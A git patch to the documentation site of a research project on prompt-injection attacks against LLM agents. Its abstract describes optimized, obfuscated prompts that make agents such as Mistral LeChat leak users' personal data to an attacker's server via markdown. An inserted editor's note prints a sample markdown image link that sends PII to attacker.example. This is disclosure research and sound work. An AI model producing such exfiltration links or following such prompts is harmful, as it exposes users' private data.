From edd1bb184dfca06d9ef1b363f7420ca513e0e49d Mon Sep 17 00:00:00 2001
From: Xiaohan Fu
Date: Wed, 16 Oct 2024 23:38:59 -0700
Subject: [PATCH] docs: check in CNAME for imprompter.ai and open external links in new tabs
---
.github/workflows/ci.yml | 2 --
docs/CNAME | 1 +
docs/index.md | 8 ++++----
docs/overrides/main.html | 4 ++--
4 files changed, 7 insertions(+), 8 deletions(-)
create mode 100644 docs/CNAME
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index e1131cb..2291833 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -13,8 +13,6 @@ jobs:
       - uses: actions/checkout@v4
       - name: Configure Git Credentials
         run: |
-          touch CNAME
-          echo 'imprompter.ai' > CNAME
           git config user.name github-actions[bot]
           git config user.email 41898282+github-actions[bot]@users.noreply.github.com
       - uses: actions/setup-python@v5
diff --git a/docs/CNAME b/docs/CNAME
new file mode 100644
index 0000000..6be123d
--- /dev/null
+++ b/docs/CNAME
@@ -0,0 +1 @@
+imprompter.ai
\ No newline at end of file
diff --git a/docs/index.md b/docs/index.md
index baa83f5..52aa8b0 100644
--- a/docs/index.md
+++ b/docs/index.md
@@ -9,19 +9,19 @@ hide:
 Large Language Model (LLM) Agents are an emerging computing paradigm that blends generative machine learning with tools such as code interpreters, web browsing, email, and more generally, external resources. These agent-based systems represent an emerging shift in personal computing. We contribute to the security foundations of agent-based systems and surface a new class of automatically computed obfuscated adversarial prompt attacks that violate the confidentiality and integrity of user resources connected to an LLM agent. We show how prompt optimization techniques can find such prompts automatically given the weights of a model. We demonstrate that such attacks transfer to production-level agents. For example, we show an information exfiltration attack on Mistral's LeChat agent that analyzes a user's conversation, picks out personally identifiable information, and formats it into a valid markdown command that results in leaking that data to the attacker's server. This attack shows a nearly 80% success rate in an end-to-end evaluation. We conduct a range of experiments to characterize the efficacy of these attacks and find that they reliably work on emerging agent-based systems like Mistral's LeChat, ChatGLM, and Meta's Llama. These attacks are multimodal, and we show variants in the text-only and image domains.
 
-We present various demos and textual adversarial prompts on this page. For full details, please refer to our paper.
+We present various demos and textual adversarial prompts on this page. For full details, please refer to our [paper](./paper.pdf){target="_blank"}.
 
 ## Video Demo on Real Products
 
-### [Mistral LeChat](https://chat.mistral.ai/chat) (Nemo) Scenario 1
+### [Mistral LeChat](https://chat.mistral.ai/chat){target="_blank"} (Nemo) Scenario 1
 
 ![type:video](./mistral_pii_demo.mp4)
 
-### [Mistral LeChat](https://chat.mistral.ai/chat) (Nemo) Scenario 2
+### [Mistral LeChat](https://chat.mistral.ai/chat){target="_blank"} (Nemo) Scenario 2
 
 ![type:video](./mistral_pii_demo_2.mp4)
 
-### [ChatGLM](https://chatglm.cn/main/alltoolsdetail?lang=en) Scenario 1
+### [ChatGLM](https://chatglm.cn/main/alltoolsdetail?lang=en){target="_blank"} Scenario 1
 
 ![type:video](./chatglm_pii_demo.mp4)
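[Editor's note, not part of the patch: the abstract in the hunk above mentions exfiltration via "a valid markdown command". A minimal sketch of that pattern is a markdown image whose URL the chat client fetches automatically when rendering the agent's reply. The domain, query parameter, and PII values below are hypothetical illustrations, not the paper's actual optimized payload.]

```markdown
<!-- Hypothetical payload sketch: when the agent's reply is rendered, the
     client fetches this "image", sending the extracted PII to the
     attacker-controlled host as part of the URL. -->
![](https://attacker.example/log?pii=Jane%20Doe%2Cjane%40example.com)
```

[The paper's contribution is the automatic optimization of obfuscated prompts that induce the agent to emit a link of this shape; the snippet only shows the shape of the resulting exfiltration link.]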
diff --git a/docs/overrides/main.html b/docs/overrides/main.html
index 32acdbc..fbefd53 100644
--- a/docs/overrides/main.html
+++ b/docs/overrides/main.html
@@ -21,13 +21,13 @@